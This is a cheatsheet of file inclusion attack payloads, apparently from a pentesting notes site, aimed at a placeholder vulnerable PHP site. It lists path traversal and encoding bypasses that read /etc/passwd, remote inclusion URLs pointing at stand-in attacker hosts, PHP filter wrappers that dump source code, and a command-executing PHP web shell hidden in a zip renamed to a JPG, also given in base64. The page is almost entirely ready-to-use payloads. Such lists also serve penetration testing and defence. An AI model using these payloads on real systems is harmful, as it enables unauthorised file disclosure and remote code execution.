📀File Inclusion Cheatsheet

File Inclusion Cheatsheet

Basics:
http://vulnerable-site.com/index.php?page=../../../etc/passwd
http://vulnerable-site.com/index.php?page=....//....//....//etc/passwd
http://vulnerable-site.com/index.php?page=....\/....\/....\/etc/passwd
http://vulnerable-site.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
--------------------------------------------------------------------
Null Byte Injection:
http://vulnerable-site.com/index.php?page==/etc/passwd%00
http://vulnerable-site.com/index.php?page=../../../etc/passwd%00
http://vulnerable-site.com/index.php?page=../../../etc/passwd%00.png
--------------------------------------------------------------------
Encoding:
http://vulnerable-site.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://vulnerable-site.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://vulnerable-site.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://vulnerable-site.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
--------------------------------------------------------------------
From an Existent Folder:
http://vulnerable-site.com/index.php?page=utils/scripts/../../../../../etc/passwd
--------------------------------------------------------------------
Path Truncation:
http://vulnerable-site.com/index.php?page=a/../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://vulnerable-site.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
http://vulnerable-site.com/ind   ex.php?page=a/./.[ADD MORE]/etc/passwd
http://vulnerable-site.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
--------------------------------------------------------------------
Filter Bypass: 
http://vulnerable-site.com/index.php?page=....//....//etc/passwd
http://vulnerable-site.com/index.php?page=..///////..////..//////etc/passwd
http://vulnerable-site.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd http://vulnerable-site.com/index.php?page=/var/www/../../etc/passwd
--------------------------------------------------------------------
RFI:
http://vulnerable-site.com/index.php?page=http://atacker.com/evil.php
http://vulnerable-site.com/index.php?page=\\attacker.com\evil.php
--------------------------------------------------------------------
PHP Wrappers: filter
http://vulnerable-site.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://vulnerable-site.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://vulnerable-site.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
--------------------------------------------------------------------
PHP wrapper: zlib
http://vulnerable-site.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
--------------------------------------------------------------------
PHP wrapper: ZIP
echo “<pre><?php system($_GET[‘cmd’]); ?></pre>” > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
http://vulnerable-site.com/index.php?page=zip://shell.jpg%23payload.php
--------------------------------------------------------------------
PHP wrapper: Data
http://vulnerable-site.com/?page=data://text/plain,<?php echo base64_encode(file_get_contents(“index.php”)); ?>
http://vulnerable-site.com/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
The payload: “<?php system($_GET[‘cmd’]);”
PreviousLocal File Inclusion (LFI)NextMy LFI Methodology

Last updated